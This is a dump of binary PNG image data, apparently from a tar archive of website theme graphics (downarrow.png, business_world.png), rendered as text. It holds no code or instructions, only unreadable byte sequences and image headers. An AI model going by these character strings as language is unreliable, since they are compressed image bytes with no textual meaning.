�T�� V�-�&�cͱn��``�W!أ>>s�\���/6�R�9<\�`V�~�6�,e	�Ba�IQ��!�'�I�0*��v��^(�3�z�j|�|0N��	�;��-#���QP���[�Xe� �$��~h�$ѥv�6�Idz	'l<�]<��Q�d� �cl3~l6U� �d,A}�:M|�"`PlG��:�P��'Ή�� ���,Ud�!��E�|&��`�#��\�|E��	~�c�R�1�؀����1<�Z|FSh��h�(1(���!�Jđh�ܹsA��b0j��FKkE��/@��.��4#u0Z,)�F�`�0I�F4��cx�͝��	a]���	�D��La104N�I!���P���G��I�'��0f��X���8��}a��~��	���4��4�D-t�:��fU+�9I�����w�����<!(e�^gl��H�=+vԁ�s)GtiI����u�Rs�#����8����� ������dx��C��!R+�;��\MΔ�B�i�s0�J���+�0�^�s&b��x�����u$Sk�9b�4!���"'��xK��!c�;�@�A;���	0Ii͚5��吸��4��.ȹc��� �iqdD�J W���ƻ�:�! frr���Q�F�E�u �-[���rl`/���똗~��Bh���W�Q���ɒ�	�[`,�7 !�7�
�'`����Y^�X�o�>�d`��LmxHan�r�?��zS"9h>�}�9r�'��M��x�ZBZ�Pps��{I5�O��m�R�� y�xv���o�9�AB���q���𿾼΁H�$1����'E<"���@Sz@5�%�c���9�;�!�T�9?Ғ��R�<	I�l�dI&Q�ؔc��'焉��j���7�9���	��X�t�ҟ�Q��x땍��̎�U��	�H6_�B�Y�g��H�A��r�r��Q��V�r�c_��k5�Z�٫"�+�ze�ZS�ku������]����[���-.޺�-nq��-nq��-nq���nq�[\�u�[\�u�[���[��o��o����x�����[����[���-.޺�-nq��-nq���nq���nq�[\�u�[���[���[��o����x���x�����[�����;��<����,��,��8Y�_96J��o�T���!-����8_((C�V�d2�5sB2�,�J���a�D��eo�lH{�=��~��Ĕ4^���-����Sd^�WW^y��?��3�S;��>�_�P����o|��?��S�Fu�ϟ��'����������~��lj��������{���V;�oh�*��Z��-�3��K�G#��t���Pw|>x��ʕ+[ZZv��eY���ˏ;���6lذw�^|kkk:��~]]]6����ǻ���~�zp�_|���ömJJ=GGG�����h�R�o޼9�9�c.���"?~����ҥo������?�F��5\�v�Ν;��^p����0�f��E�h?=��x1���N{{�ѣGg͚���������醆�ٳgc�X4E���O�W�޾}��E��(y���"�v�m�Bw!�K)�;v�$y�79r� �O��Os�̹�����|�+�=�������{�j>���u�V �C=t��o?�����z�G��/~�q�ƿ�ۿE#�w�~��N�:u�]w�߿���gpțn�	��_�~�K_�_�������,^����8��z���O8�����}�C`������h
�-o?���]w�u��W��Us)�?��s��}�{ߋ����aT���������?o��`0���|&�q� L��
��O}�]�z:r�����X(�r��8�u�u��,xX��?��?��NNN�3�v�`��ҫ��,�Z0M�Z�ɟ�ɞ={�����OPVNJ�j[�l����A��w���8�x����l�g����>��JJ�
�@���V�\oo/����'?	�°����/��B��*�P
#��:a<��ޕ@IU��zk-�U�Uo4]MC�,�EQ�����Ht���I4����2�1N�$��&� "
� ��(

6��]�TuWuWu���|�P)eI�DZ���|u����{�/L.Z�#����j��9�`����Ҳ��'�x!��b���bkE�oG�X�V�@ 
�
�����Ž�|>�p\m6ۂ�]�X�H�����O�����n�S��U�V��n`jee�m��m�
V�v�w0ƃP�g�*8�O��0��G��8B C��)�W�X���x͚5��:uP�<���5���
�?��'ZCx��AP�x.������n��~Z��o�5v܌땄�*4����qd0��i@#BP����3@��� ,(�P���.��J��p/�(X-`����C�	�*��"�x�I��@,poG8�0��$l ���8p<�G��"�]�~=\\Ԁ�n߾}������,���#ަ�(@��p�4:�>��!���� ��Kx
����f˖-8�M��&u��X�ҿMh]�>�c��kQ`
H�!
>r>cA�C.+�q�OH*��8B^!����	E����6�ȱ�d"4�6q���'�j�i"�^xaܸq�lԁ�J�ȡ�DO�O
�Q%��0�7h����5-�����-��q�F��pqc$����TlB��9�B��?�����"��#�&
0c�t$b�	+H���G�\.����ıy5�D�4�&D��VUUA:![�
�n,a� 
�U�X�X��
���2�X�SPP@
��p
l�9I9�k^^��鄍EX�d8?~�8�ģ0��w�}�7�x#H��O�# ��B�A�0G�nt=D��/@�fa`�آD��W�v�Z�����ă`�� �������,Z��~�!hp�K�F}���و�)�mkkø�&؅#!�!��Eg�̙�#B�����!�>�uG
Z
����x(��>�ΗU���M�u H���p_��O�>M��<Cx�-�y��;c��/�A�X���4�3�rZ���-�3)�J<`�S y�	9���D���v<��>`.��½V�e��ill���m%TЎ�"��H����<p��z�U4h�4ȡ���7b����JII	�Hc#�E�^[[�!WhlP�DŽ	����f��4�1��`��p***�h�K��$�JL��ܹsޣ
�D��
�3(�8Tbh �փ2B��G�$��R"�[�9H0���@P ^p��WQ	@Bn�$������F�N��h�%<ѓ]%��G6��K���!ǀp��i����rJ�@�@��7��G�G�"���SP~0wx���K�F7(Х0=D�p�(�$V�?P.;Y3�h
h�m8��@=��Y�&�KtODS�<E�P�_YY	��x<�=��P<��*ALn<9���OD?ib����%n7�e���'8Q���V_h&�BDr�����ƴ���($�	��H�+�c�Q�B�F��'��2]%ɦW�霆���v�s�9��d����i�:��x�̡�>VOMQ��:��G4�qŞ�p
�c�1�OL��D���4�&ެz�OQ^]���r�PO��#-���EC�U��iʹ-��2�X��h�ՊV���V+Zъ�[�hEíV���Ϡ$�|2�cXV�>�n��IrX��&�/S8F�؏�KV��إ�vd0+r�,��͎�zg�!(
�4��$�T�a��a)���_�ᒹ=`��_�8֔���T�i*��ˑhT�_��څ�3l}��w�o��G\�Cft,�I�u���9�(L��%9�諎����;n��zמ�p�
�*ފ��s���iS�VNɾ�cň�)����$�R���ooˏO�>�a4X��.�E԰���s�[9�,�Ir���p�s�[Oz#�����삍
G�_iʢ%��U	i~�H�~�3!�8��=/�_y��i���0�'����5�
�Iy���
ߍHa�&!u���{��|�埇#}"�����bNd��\R��kϟ���S+r����S�	��0�;�s޵�ȧ1qCVl��I��qDMB���g��^k|�c8F�$�L��7�_#���0����}�Q�sQ��Kuj_�������!J��$�,�~�N;7��zb�h-�.����g�r�]\���`�3��lu�N��b��ԁ�'��&d.�M�(N�����$�
�U��`M'E�a�F��W���c�uBj�� ���4�8f���c�.$y!�3G�.�́?�$d.�S��f�}L�ᮧJ3�7&�P��H��~ə�T�a{��)�0�Ƣ�[�T����9i�m�=���f(��|���r�˗\�(L��M�k����Dz����:���?�n,�a�y�S�
���}Me���z^�_]`�
����Z�'�3�ԬK�Uj,�N�W���~K$�"�@���|+���br��W�#9��mh|�c���no5���,�.)���%��坞S��窗4�%rI���c���Y춺Q嵺����%�"�K!_v��	L��(��d��}(���6��w��_�oy���-e���X��
�Q�)���q�哣�s�hr�����OWWW��a��)ҥeǎ����d����~%����ݻw��'L��	���J2܁��yVJ�9v�8_���&�۠m�03w�m�
Ѐ`i��?�c���G}�u�V�<��s�v�ھ}��,���Ç�����m۶��O���Y��z����qjYe
C1����*�-<��_2�F�6���O�*�;� �i���q�� ��,95hA���΃Ξ=�-//�\6o��ƬY�&M��v�;::ƌ	�����{�Ο?߾}'O��馛��겲����3f�8qb����5k֬[��̙3��Š��5j��l6��)))����>�ֹ��!d����=��x��h��5�gP��ٴr�1)7�ش�q��:±�`�^��4��t���?r��jݼy3�2y��~�����=z4))�ܹs,˶���-���:5��ڵk���s������C�QNY𿤤���-�:uj��]�V�D�`X��rD�����N_cY�m-�c�-��Q橯7�`Y����xs(�ͱz�v�J�J����r�`�^/0�+((@ͦM�(�pzz:�:00�LNN�Y8u�,	�2��?�
	������477��.�$�+�p�2e
�nE�6ZT�<:�����[Mȼ�ݮ�ސC�Lp�3ME0��Weդ텩7������:�+�1��Z��رc�z�����J������0F�g�…�\����^��;3����/R�h��H�"+**�����ܘ6m�fo�_'YGi�Y�_�"ĵYf�mz�h���M#���7}��w���-5�f���4c����Q��X�vV�-.��<���9�kvv6�qt:������E�[8u�o
����t�ҥ�9,,	��t8�?@�}���SztJȴe˖����mžS��p�U�Z���z��|�����xfq��@��[��}���~m�K���c��z�.u]��{�1 �EFF�>�2I�a ����o����2(&��G��q����ϙ3g����^Xf-ֽ�ߗR�qϝ[�2t�g�"g^U��˵�����b��o)���֟j�O��;K�+�X��M��Q���1a�7�2o��7���ʔ��J{���6y��������f~���ES�Z.�

A�/����qL��=M�z��gz���KK=3w5��o�Y�,f�K��u���G;�[�IS�W��������=0�h�!/�H��Bl��)����2��2~�_Jc¥i���y~)e��cG��5�ųƈ�ua#���:c��79��gz�q/3|��	o�[$%[*іtϱ2���{���Vж7@/�$�XX8{e!��Aڀ^De����OJ��b�Nj�e�O�_���v%/y�za`�ۭ�(�Xds��Rf#�I^��g��<s�7�3���T!V�BVC�E�5�!��233i�������:/��#
�PZ���!�g�m>�3w�uEi�q:�: y:�>������}
uW�l�Y�
g�f'O8�����kTo�E�<�zg��.�(L%W�	����6�.�]]]999����%�e,�o�3�Q�_��'��"E�|˗�bx�1��@뎺�H=�<5������@;��n(�&f-��߫.)��r����v$6�
�8eQ��ap���җ�n��y�����y`��'.�����g�y��i���+v�ְ�c���e �k�o��v��כ3(˼���<u��&n�����%O�� y�
l&�Pr�h��6��"J\��?b�z�, 
ݐ��)� �mv��\��=-�^DG:�	F�hO���lʷ*[��D�pl?!r�	��&�Ɣە2$�u�ʼnԿ�O���� �;��;���Ɲ�O�u��s���o��+�r�Z�k�3����N��'>ݶ��9�/��ű�P�o}�m�p��@��0�c���ܺX`
j���G�]Pg������‚_�6��O|K�~vŧ�׊�ۿ��	Z�f��|rX�g'��a�9I�®s�WN�lV��R��6"���ݜ�'�i�t��/�.���_jrx-�25�X`��/�{��H����BY��^���-����'ow���i�qX����������0,+�����f�C����V����imPv�l�����u��Qh4��bR��e��B���G+#�ۄ��
���,(���X�V����"�#)6��hT�DC�,���~:1{q8��'�Ѩ�Ybяz��m�#ʎH��D�i�W"���g���-�GYN�@��K]�����ުޗλv�-~�-EC<#��cф�W��i!IKw��s���έ}�_�?����gSR��E��S���5�ii}4?y�]X�P$�	��:�'�9K�>߬�8Ny�7��@���D�uޠ��@(+��8�b���z�Zf)�O�wNR�Ұ���t�h�Qށ��y�����%�l����ϰ2v��T�nZB�ϰ$hb%�U�^��m�Rbڈ���?Hc�V���V+Zъ�'_�¨��I
5�obs�m�x��v�NJ�
WI��a�T�CR�%�E�K\2���׉eY��bt*��:��-�i�Ī�S9���]�;�'�!GD
��,f�̳��*�L��RP�ye��]��C-C�����4&��IS�R��$�A녵� 
�׮���	���T��Eo���R�<��t�oC�h��y�����YK&ʳ�,K�:�=�[g��	�&���t�?�Ԓ��o�<�R���2�*5A޻h�ݧ�7�����\2��rT"Adt0,Y'��a�y��
9�D^�X�t���
ω<cP_l�QQ��2���4��g�Q���ܯ�%m[�*��ޅ����]�H��O��~N'�g,.H�C_uz>��3"
|Z��?�ܵr��lsIbZ]����M5��N,p����'e�e��#����m�'D�d�,�H�ֆ{òof�׵71Fn�!���\��g�{���WV����U�P����vL�.�o��8(y�?X�r�h(��R>��F_mx������bN@�I�ai�o��w������hn�wBJ��,}��T�j�w��i[{i����ӱ�������5W�(�a��U�Y�܅h�}�?���Hǯ�R�LQ�m�-z���9z��7<�p�X����g��
�A�Rf��Gϳ����C�O�����ݲ�funrE�uQ�>/;i�$��Q�޶�j�s
T#a�}��+�(�.&W�o���u���c�e�Ͼ׵���-)��vڽ��ٽ�����[��u����_?1�n�`��~�o�*Wc�p~��ǩ�b��<烒)>����p�?ۇ޷{��l{�c�dm��1�5!�
�]7��t����}p�
�y ؜e�8�2IR�
�R�+<��,���Wac���w��[�~`߰��
�O�lY>�+��
��w���8���}m���Ƚ�p0�Q׿�S?����J�`i�?YRw�J*T��׋#*}>Aw
��x<�P(D9ӈ�6Ԡ�U#��x��L����`Ho-�^�ez����z[�F������S�g����;$e�,Zӿ�b.�9� ��94^�D�~b�~8f�
1P�&��j\�g���s�F�����4#m?�m�]O���Qi�y�`�s(h7
i���{�?����
��Hr�Y���fшYȃ��ct����������L�8Q�'�^�庺:[~��`P�W��d3�gj�_{WW0�Z�f�������H1 �v!�
���w`` "I6[��,�<n��C!J
�A|G�°����eu��’/�T��;a���Tx�g��	���a��Fo��86�V�%Y�=�)))A�y�.Y5��^���y
�T>���v+I[�V�w�`����S�����eI"�99�ْ���F%�����C��)��u-P�.IEND�B`�featured/images/downarrow.png000060400000000447152434416630012351 0ustar00�PNG


IHDR(-SsBIT��O�<PLTE��B��؆�a��`��V��o��W��m���n��n��s��ߏ�q��U��Z��n���o���)�עtRNS�������������������OO�	pHYs
�
�B�4�tEXtSoftwareMacromedia Fireworks 8�h�x7IDAT�cF��f�`���0�/B3�τd� ��l|���0��0^W���IEND�B`�featured/images/business_world.png000060400000204503152434416630013370 0ustar00�PNG


IHDR=
��tEXtSoftwareAdobe ImageReadyq�e<�IDATx���]Wu.��>��3�Q�$�˲,˖+�06C�A�$$/�^�ރ�` !!ԐB(?Ŕ���q�m\�nI�d�������z��o�v=3��'�]��՝{�=g�����E���F����������G�1풥KO/������G�$��O/�/����AN)�u>�9���<�����ح�V����6���U]�\s.w�V�Z��ba�Y����;=FFFy��<����{ݶcLJn\��w�_�����
;�8�x���]�n��}����6o�B�P���_�}g���·�<��=;�8��_TB���~tt����Z�EQ$Ϗ2��I>wpd��?z8��g/:}�N?��?؋�<@\���o�����,�#�3����$�~���C�o���i�}Q<�qp������n)tx����������=��-[Pb��
�&Wp"���$���s��\;}�N?N���cdxx���\1J�OD	�O�����FƏ�N��s���t��]��x�Z�����Ӕ1�G8�87}֌�c�J#a���&)W&y��������ܟ_�q�G�n��h�C� ��Y������H���(W�Q�^,�nċ/5����wd��"�XI��\���i�8��$�w�
kgw��8��H�����_}&}}}Ǐ�0�E�V�7o^kk�b��J�b���h4`��Z��7%'p]p>�j���
N^�T*�
\)\f�p�	�<r�H.���/[�lbb����a�a����P�v8��G���=|���g�
K�oii�6�R\�S�?�|?�y�̙p��###p����S_�Ν;;;;�O���	�H�\�������.햣�}cT��3��w��H��Bn�r�{��:H���5fNk��KW~�[RA�u4o��b��]~����пEn�;�k׮}���n�={6���܂��{��sΊ+�ןx�	��+W���_�;v���1c��
B���{wtt�+���'��ѣG����Z�
�=��J���lڴ��k�ݿ?���ݻ��/�袞��S�D##p�={���6��R���h�\s
��)�9p���'N�����)��)>�W
G�_
��>��/��Ù�ݻ���/�r;V�+�r��r�����6x���V-\�����8n)��V�������?��Ƕ��E�O���ޙ
������}#�c����ڛ��Tj/���M/Wߴra[!��}���ʅsbƎ���MT��d��.�'�y�Z��R���y�Yg�˿��ܹs_�������x���p�:{�̢E�@7��Y�z��i��~�0�?׬Y�`�؅�'`��Y	ٸq#�T�+�P����V�;���-p�p�`����Ӏ�z��@=�ھ�e���p����W6�$/���3��y�fWX[X�[���K]]���aO}>p9�p9���	7>*���N(/8Ipp@��w<xD����x7�s�|�~�ѡJ�������P��o|D7�t.��cQg�=/=>4Fr9Alʻ��w�Y��cG&���߶}�U�f�nk���[^�`�p��7�o[1��m|��ٕzc�R�7<��GZ���y�W,��聾�Fg�6��/6/�h����*>���7�u&����ؑ���z:�9���.ؑp/�:���
{�?�)���u��-Y��'?�	�$����ǰk�9l�ŋ��_�}����|��� ��}AN�?�n{�H���<��;�v*X��z�yj7�7�àNt�<��ҥpzs����d6kFH��G�=
�Z	V.a�z���0�U��� �p�SK����_��…a��#��p&�:<I�����)/���da���`%����5��a��g��@w̚5N��#(&п�p-�3�-���Z&�iM�J#y1D��sFGF^,x��ͥx��o�u]�D���$ ą�:N�P�>\�7�#*��ܣBqJ��.�;�k�>.-���͞v�⹥��.x�p��c��7W�8��3gT�t���?��3g���_~zǖ��7�u�ݩ����K_�R�R��!��
��l�Z���~���6�|�_����
l)8]���
���5�}6S=�����ꪫp����`�k���l&��О���k�I�z��)��
zᗞL�z�W�+ x��W�8>z�CYMM��~�z!�9S.E.�V͒ߵ4I�/x1<^,�x�b������w��*�7i
nI��w�Y��Ջ���U��=8<�(����h��p񡗯y�+����C�0��X��T���c͹����tZ�Ջ��ji��U����������<w�G^q~!����՚Ui(��q�X����@�@\Az��^�����)M0# ���@D�Ex��nQ]{�\1vɹ�{j����Wy�#z3���?�qn��vJѝq�;^}��=�ݶ� ���|���sۚw�,�n�|������� ��@|k���ϻ�����g4'�&,G�>������|�Љ��
U��ښ ����o]���s��h����ag�Ҥ�l6����a�袋�ZB��ۻv�Z����|�,�4x\`u�E`x�r��<��.<����������^���0�G��sښ��C�
����pќ���cep}��l�(f��ʍtG�Pg�����hEZ
9QhG�5��������o���J�vdd�yF[���Ӷ�!A���B?y``"�I!W䰯���������V�쁐��߾��������X�^��9x�ž={ ��#�۷�b�����ӏ_�����z�E��/~q�W�"�r�q�����<5���᫯���:�~�W�K�~�~�~��mo����-rB�ҵA(#��G�/����k��Q�[�?���X�u{H*��-�H���"��m�N���;�i��^!�2�%T���\�4�Ԭ>��w��q���ف~)f�e��
_�4����K���s���W��w&,W��p!����-�[�9���H𔲈*�$o�I��C�IZ���XZ��kn��[�l�N2αN� �yx7O�,�Yp�n��d���+��R+L4J��C��x�‹,Ω#	8=Ex��V�3�u�I]�Z��$
us�p&����(��=��n[�&d��2���S��w�r9Q��L�䒪�3Y�H��p���
u�I�ocMM�V������ӈ�����B�H�B���-�w�X�?O�ꫀ�����W�U
�U����@��� �)q8mXf��h�M$ϬQ��uW��m�W�r�+T�ܒ�>
�YA�z��c�I��7���Y�0�NJ�}#��#�"H�Hɏ����6-�v�J]�>K9wi��TwI�ހ���-�45?j���G�a&�Wi��a�;�ZI4ъ�h/�'��8�F�$�_�~��EHR����?�2:AF��Rj��,��\�
��,?����2��Yj5�/��)\�gc�+j-���z�Hᄕ�������11�ޜ�3trK�%�4�n����Ê��Uy@8,��/�-Z
�A��S��J��A��NP��p&), �����r
1�&z�A�u��	��ERl"���#�J��o��iC_)|-�Gx3W���w����իz
���ꘔ88=x��`���4j�R�o�[��Bh��x�z�m[�jp�ӕػ뉢6P��؝�Kzم�OF\C�I/U2f�q�Ҭ���.x����
�:-w$��w�:R-��T+���1m
�3:I��3�\YɃ3����Ԟ�oa�wBZ*J������G^���\)ӤDj5y��ł<N����I�C[��0GJl`_���&���r��P[���]��[��m�/Xۈiy�ŒN�RWWP���x�a+�I2!E��$O�F.��a�$�]��F��yE%b~�;]�ߎz�E��DX[��NXx��TgyR��/��!/�	7~�6�gAD���{�6�$�'x�Ԉ��R�P�-1�Ŝ����W¥�k���2�
���yyi�&�Rz����8�*��R.�����Ϧ���d�8(ޚ�S�}=�0�Bh����OirY�W〉��,�'��j[
�Έv�LJ��i����\G-�D	0�X.MQR7�2` 
�R)!��p�T�ĉ1����;�lY�	Vv���T�o�4T� ip��y�W�DlW�Hȍh��FF�ER��:�*s�E �1R[�yn���TK2*&a��|{��<�H?�7P�[�MFo�8_pu�-T���2�r�@$�[��e8C��#J,��kP}[�E:��n�����˄��1:���B�K�t<"�6q�"E4�>���k�E~��&���g<�	0��0�	O��ŗ�M���2�"b�B�Fϑ��F�ȭ��a�����bRT�K��T]P��%S�ɌfͯV�l�!�Q��Z�45g�a��30J�Xw�g���K��K��8�!��n��7j?I�T�)
!����F�0c�՞�M(��5H����oAߣ$K�
�
�i��Ǥ`s�m5lq�(�gp���چ��ns�J�0n"����™Y�c-!^��9��KN'{h���*T�/���P�cA�^�'�{�RU(�p-�(vV�z�^��Թ��hm�\������F�X�<�t����[����RZ�>c����o��yK��&�m6�[�N+�@@�ˤ�?�ZI��[��l��N�C���l�#���2��L�v��h�4~�ol)�**��(�	�L%�PD�16�&�i�NI��nU�Ft�Q�'l�I {\h�+C2�h�[Y������"�H�,�L��`���_W:%��S%޸��d��$_�)�fC	?|Pd�O��n��|����t�8Q��EnkZi'��©�_+�@�$5,Ü��?bYZ3#c�,�������=S�LS���qe���̃m��N,�-g&��Ҭı#e�@A��0�ˈl�]�p	6�R��Kѥ�ƴ*��DzCr��'OeB'���<�[;x�oF�����p�iaSV�"���侔��
/��].���9�pA�K��[sa����6\������FJGP���lk��;h��é�/�:2�-�NƆUN�I
-�ҩ��D�2���GI��M��<+0��5m&�D��ݰF��0�E�M�U��;�ׁG�KR���ڦK�
���R��%m��������A*�g�R[�f�{�����[}�jϤ�j 4�th[��DY(&T�پoB�!��6��\������C�f&�˪L��)�d᫆l�1�e񫉮te�z	�m���„��p�&'��D����Ls��[�wM�����H�Ѧ�$�&:%1㻚[�f"g0ei�K��ڕ��"���WU�"VKsKpW	#��2���@�w��_�dN
IyB����"�ǑL\(Eu����G��:���9�gRL�務�Q�۸N�ʄM]_�Tʍ�EC��yT7ڡ����g$e��m�^��������1�Ju�
�[z
\eb����f����R��$n���D�Vm�(F���O�ó�(��n{Zw��^��x"��R]\ Ld���`��Q��j.ʾ�y��\9�!.�Vz��f:I��7 ���,�*��%1�P����@gWm����D�0�1�g�^wB�0:$w��"%W2p͓D���gj��F��'zȘ��J喇�Ht��~�8V,8���*�g�WD�K0����\�(��1�e��v2M�ș�
 
,VSշ��c�^X�9G�FU�M�����S��<���{AC)�(��$��z�4[뚮�yڐg5}�<�}J�1������Q�:.Qa�G�K��E&[!�塆�b�L
o��:�_k�E�)�m�>km��>�ފI�)9�+�א[_ڭ�t"ʂ��S��N�k�W?2dj!f��5�a�-��;>V;3ԅ,̻`rKG�9ydL�`M�o:!�1M��2�,�_�Ĥ����J��)�t-�j���iYT	'�j̻�
L��-k��h�[�M!.?�Q(J�Af��ɛ*��n#�tb��X!Q��x��0:�T-�D'�dl�D�2�n1��pdy_�4晬����9zΠ4[۝�[(���w���m�aU)���'܃j��,P"(혯FCF�ɳ ᩊ�L���S�t����̼0v^�ȥL^��)���c<e��f��!+���dY�S%����a0��f�d�zuͪX
76�Y��?ה�Ee�i#fj�BY݄k#�J�J�@T��O�[S�U�����\-��Z���H]��)�3�Z�ꔬ�P0����hC������ut���HeLD.��;5�~�LnI�y(��>�����1&�)�,���T���q�p-��;�j9H��ԧ�j�?���܈��E�Z���{O*H��ʠ�@2�FȌ�R�-�Z����ȴE��Wos
�zCʝE��r)�M��A����o�S��R��3S&�2��Wh�J����2���i(�S�X�
�Dh��O.�r)B,��1�zE���k���~��X.S�xP�](����!�1~�E���jB��t$̊3H��D8�{b|N��7U���`b\�ql�hY���(�t�U�"]�M�y��0�o�YafX��{�z��"^��z�͏�^S��sg^c#�`
���h�(��S�)�
�0�3�v�3$��̕�k����*�ǹvg�J���W�]�T����, ��\�:�.]J�3Ŝk3��4_�TR��Ii$1�GL�*���6j4\�=fNވ�O�5��
qx@�1ݲ4��y�a=�u�u1
��t�˺�֏B}Ϩ[&�׺J{����.�#�S��awl*B�Ck���j�&��l�
���AV��$qu[�jj%=3�y�'ȉ^�*2]	D@�q��dR� ���m��%_m��/ޢw�Mŋ�8V�~�c�j�Hc�� 6���Xm�W_��aέ��/��W��c(NY��d_��^8~K��5 �\����-_0����oi�<�
:W7��x��
�16U�Ao%@�r��"<��	O�C�^���R�Q�����~A���:^/p�KM��{�4��i��%�6����Z]�Y��B��-���R��YO�V�E&y2�P2����x�0%(����U���j��!xchjQ�g��9Cf���T�ν�ɇ�d�r=x��IdZGt��M�ek-�;U�f8%�k(��a��t"��3�>������ APf#�!穗�E��Qx�ͭ��j��J��L���R���KIEx���?�MO��z�!A��'[�A9�`YW6�1�lC�Ȁ�'�wȈ���?�I�W#�'��e΍�@?�M
y%&�㨵g�|N��f:���Jo��$�hrG����f�n�� )e)U�R��%�4�vbr�S�-�T-*�[Y,�S��H,�4�1o�f1SW�o0�[����6*Z�?C��x0�oPp�P�"M�56j��%���z�([&�2�L��Ǝ��$V��&�Hy�8��_�P93,7��E2���uIϮ9��\����z��X(j����V�C�R`^��W@�"gq��|��H5Ej*�R�y��Ncf��2e��H����`+(�C�S��2�E��N�b1���Tc'�v�iu���\�2��{��J�D
l��
�2fJ&6�o��1�63i���1t� 
sM�$**{��X"k?p�cj�h>/��@J%���b��BD�YcU,*L��L�t���4���F͠�E�F��K��8�Y��D��/�Zje	�/5iO[�A�
f�v��
�͸��ȹ0��	��8�ʣê�@��B~���3U�y�G܉��z�0�LR�i_��ܤ-i��UX�{�Hdj{�zIPC��3� ���<1�h� �ȼB��I�p�
�6�0�/����a5����*�6)-�����3���Q�G�r����oT�� ���T�Y
+g�M�6߃�hbz����0�u}n~�w�D��i3H����IQѩZ�P���KY'��R�@�[�̄aS+�h5�{�����n#<#�^
���+�9��H�X��Gh�lR�����Rc�@�J�K�b��{g�L^y[Jd��]T7�H�H�!��G� ӂ+,�S�z�E $�3�0��3t߯-y%���뱽!Sڠ�&�if�	�%�,H�\w�u���ж��0�7�w�E�$�B���+X�8H�ҋEm���Щ6����&S�J�/9`�J+ڰ���F�=m�1�eԾ��,�
7�_'��6Q��W��A�(!�Z��2��n��h(t$�RĔ�����*���ݟ�]!lۍ�*���h���d ��5�
HTvE5��%����r]'���H�x��$�=�
iU���#�{Y<Z�f�`D�f؈�^'��|_��k}�)t��/��;��)H�-c�Vz1	�E)��k8?�f���H@0��8Y�L��(�,e^/Uݡ��/��n������p��.OH�U�0#��"�b-���������<��	��QP‹�R�~7���Ʒ����@d0�"��D�6�ҩr��6��Ӣ�eS��B�¹3����97�hN�R��Hon�!�'&igPV�h��<��ZG�zᨿ-qצU���'_R�w]�2Y%���>������U������P {6�����UQn����]`���*��5��k��ۘ=p�=隨׃!��sJ��ek���Ka��f2�\�,Eɤ��Hx���PR J���~�,
	�K��kQ2x4ǭa�_C�-�sG��i��b�%��
SP�ڲ�L�QX䀣���n�8t8u�r�VDؖ.�zGQ7s�l��A]�'�L$����Y50�DV_J�%�s["��nyDt�iZ�{+VRJM52��
՜HL=����
W�tfV�So��ɇ9;A
���y���[S�D�M~�!�w����'�!jR�.�̽��
����Gj�а�Ij�3ġ�l��3QFR6�m�p�-{6�x^դR����+��	�e�|§wa���(w�~�m�в�`oE��P!;��x�:�<U�	���I*U�u�䐭-L�y����������k<K�c��$,Ļ�'�̇�񠜋mq�c�����Q0v�L0� ��j��5��
'��_�ЌM\���Nꐪ�1	�T��z]S(��Xk{�i5�Y/�HE�חG�TR.B,t�`]g�ѝ�,G���J�A}�GUˁ�A�I�I��t�f�6���2���d�*2������"v�S�J���zB�t�%�������g6���-�.��:S��'��f�(\�������2+��o1)�@�&?��¹n��kw>���B�F��x:����"���M����T�$���&�W�����E���G<�>�b����� ��7���{�@���:�i8�[c-��a���{4.��U��m�t�N�ȯD�K2�ސ~�]1���¾�H�]��B�#sŖ]�:�ҭ����
$�Ʋ�$
"^?p���Jx*ad�!ݐj�$�=��a����w�sG�U�/���7�+id��%��:,�[q]Y�ya�Cqt|�x)�Ҡ�2FMEE�m ��Of��
�u�q�R3Ɍ��ʦX�~��
�\�MߙWֲ�h��b	Q�d�#���h�Tw��_�]ͦ��g��5߇2�L>��"�C��W��Mo�$�v�����An�鲁�=�2��e"6.7`ܨ�^3
��F�J5|輠ãy5a`zVh�H���
��ć�1#��+S�G_/���
���Õ�6��pK%2<�l26?�I�7��lOIC���`G�0[P�x��Р��y��9׌�C���\2��{�ȭq�Iޒ �$$�^����� Q��*Z9Obu�k]k&!L�����A�~����g?`��E���P?��c���Mu� ��W*k`rE��ۘ�W��0�eWF�*�����'2��j�#�_Eqe�����҅��\,�o0�F�q���G��6�+�
�
}��m
���j�{��!_��C��̈i��t�P�.�ta�nSկ�J����쉌���:�(n�����UՔ��d��l�1��-OH���Ph>|2M刦�H5#��4�"�q;�b̫���:53���{�Jx�F�Zm�c���SH���I�N��q�~>A�'@}�dd�R�+֮r�q�E��a��ɅC��<��*m�l�#�t3��-�{��"DV�;'�6�z��Y�C�b�@*��S�c���@����t�lM}k`��T+�6f%
�;�B�Y}���u�̖�/Z�MG��\�f�bI��s�M����0�MlNf̱"	�"d�d#t*����6�&їC�k�p��Ĺ3V[鏫�a�Elx�;%WE�hhG�䴸����\8�D����☓IS�;��&�,�H� �
�,¶�Hx��*c��)q=���ܩ^Z���:�"^��d�eh��	t������4S����XdLC#(s�r����`�ͶcW&LȤ��X�J���"�`�pa�X��ɍ�����kj��&�S�VA+�{�Dnq\�0.E]R�

��ijby�"���1�����B8�0�'�x�#7�#�2L�)�j�s��*S
NlbL&������1->�>r��z%�H��&nn?(��FB���N��i6zj�y�O6,��

����a*[7��5�8���a�L���R���۫����Y��R��"h��	(얰M�d��bTՙs��cZu�D=���|���Y�����[��t
�#�p�`��Sز�K�
�ϓl�R�ID�;�t�ֶ�kɉ���2�"5�rdocF�[�O���
�[���z�gN�鳙��
6 �*l��}"���7��%
j��
��h�O�t�S�n�Fߥ�k��a���6����I��F�X�u�ҪJ�6��	�bA;~H+#[|���c�CZw�"bJ��8��.Iu(�q��t��w3�12l"&�(t�݌9,1eaT��i�5�
�~jeWe48R+�C`3 �0`k������Y>I�����qGbs��;���L]�O,�^�=7J���L�!3��Z1E?�Wͷ1݌�u�v�sN'��N&�V�Ph�2ՙ�^�A�Tn��lR�����1�gS���c�R�)�_M�^�~wG�E�&~lRM
o�d����\N�����2i��V��+pU>g��u�+b��Y��ARJaGh�h��*7�Z��a�
��D�&3��%�*����|��o�b�ZH(q�(��AXẂ�|�����4��� '��Y��g&de���^?�R�R<��9��xF���t�U�z��_�l�3Ӕ��fw�D@�66B:�%u�`];�L!EBd��@,=_fr��d�7��C�A�ڊm�d.v\$�����s�L"�9Y}�f�EMY:(�˨OM\�.Zz8X�V����)?|�K�ž�.��~�+>�=�ý$'q�8Mw��T�蘡�+�	��^b	�Ser5m��u%��S� y%&��J��x�$�}�
홃��M���HM%��дOL�T��
h�ԩ��B�DaK�I���`�3����:����r��0�]S~�f`��a"�	��N�hUߕGK����&�8[5E\f�4-�*����EV.o�r<p� ��_����4&O<��*I�N��)3�3뒊`f`�T�d����$��O6�+z&�M�����y���j%θ��47
